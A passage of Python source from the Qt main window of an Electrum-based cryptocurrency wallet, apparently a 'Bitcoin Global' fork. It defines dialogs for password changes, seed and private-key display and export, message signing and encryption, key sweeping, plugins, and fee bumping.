self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def disable_lightning(self):
warning = _('This will delete your lightning private keys')
r = self.question(_('Disable Lightning payments?') + '\n\n' + warning)
if not r:
return
self.wallet.remove_lightning()
self.show_warning(_('Lightning keys have been removed. This wallet will be closed'))
self.close()
def enable_lightning(self):
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
r = self.question(_('Enable Lightning payments?') + '\n\n' + _('WARNINGS') + ': ' + '\n\n' + warning1 + '\n\n' + warning2)
if not r:
return
self.wallet.init_lightning()
self.show_warning(_('Lightning keys have been initialized. This wallet will be closed'))
self.close()
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
# lightning
grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
if self.wallet.can_have_lightning():
if self.wallet.has_lightning():
lightning_b = QPushButton(_('Disable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.disable_lightning)
lightning_label = QLabel(_('Enabled'))
lightning_b.setDisabled(bool(self.wallet.lnworker.channels))
else:
lightning_b = QPushButton(_('Enable'))
lightning_b.clicked.connect(dialog.close)
lightning_b.clicked.connect(self.enable_lightning)
lightning_label = QLabel(_('Disabled'))
grid.addWidget(lightning_label, 5, 1)
grid.addWidget(lightning_b, 5, 2)
else:
grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
# only show the combobox if multiple master keys are defined
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
labels_clayout.selected_index()
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_show_xpub = run_hook('show_xpub_button', self, dialog, labels_clayout)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_show_xpub, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(data, parent or self, title, help_text=help_text,
show_copy_text_btn=show_copy_text_btn)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
# if redeem_script:
# vbox.addWidget(QLabel(_("Redeem Script") + ':'))
# rds_e = ShowQRTextEdit(text=redeem_script)
# rds_e.addCopyButton(self.app)
# vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin Global address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin Global address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitglobal:"):
self.pay_to_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"),
TRANSACTION_FILE_EXTENSION_FILTER_ANY)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(self, _('Input channel backup'), _("Channel Backup:"), _("Load backup"))
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
else:
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: PartialTransaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
grid.addWidget(feerate_e, 2, 1)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
